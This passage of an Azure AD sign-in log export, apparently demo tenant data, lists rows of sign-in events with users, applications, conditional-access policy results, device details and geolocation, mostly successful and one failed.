+984,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:02.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",669c457e-4441-4eab-88a8-07b78d9e1400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,669c457e-4441-4eab-88a8-07b78d9e1400,SigninLogs,Sucess,33.0175209,35.44601059
+985,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6101ddd5-b5c1-40c1-a92d-59853153caf7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b58c6208-3745-40bc-8745-ecaa2c431500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b58c6208-3745-40bc-8745-ecaa2c431500,SigninLogs,Sucess,36.6404686,-78.26995087
+986,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:56.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f1cc469f-40bc-0000-4704-a0f1df7d2df1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",0cfe4b5b-09c7-4394-bb27-21b9cafd1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,0cfe4b5b-09c7-4394-bb27-21b9cafd1300,SigninLogs,Sucess,41.90428925,-85.99833679
+987,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:34.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,68cc469f-b08c-0000-54b3-3f96967b505e,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",37105d23-9607-4aeb-a84b-5fa3358d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,37105d23-9607-4aeb-a84b-5fa3358d1400,SigninLogs,Failed,41.90428925,-85.99833679
+988,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:27.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,583835d5-f4a2-4775-846c-8e6edffe772c,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f2d9511600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,1dbd81fd-18f7-4582-ba72-d8f2d9511600,SigninLogs,Sucess,41.90428925,-85.99833679
+989,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00a87cc7-7d52-4fbc-9b05-fa4a2cd018e6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f24f521600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1dbd81fd-18f7-4582-ba72-d8f24f521600,SigninLogs,Sucess,41.90428925,-85.99833679
+990,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:03.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d2d517c-f01a-48d7-9297-32a0e589da73,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0eae02e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,8d371308-4e1f-476f-97d6-c0eae02e1500,SigninLogs,Sucess,41.90428925,-85.99833679
+991,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:08.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,abc3ecc0-f9a6-4b3c-9607-4915b6d43e06,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:38,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",8d371308-4e1f-476f-97d6-c0ea812f1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,8d371308-4e1f-476f-97d6-c0ea812f1500,SigninLogs,Sucess,41.90428925,-85.99833679
+992,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:21.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,472fcd1b-f08e-461b-9211-f56da55631fd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 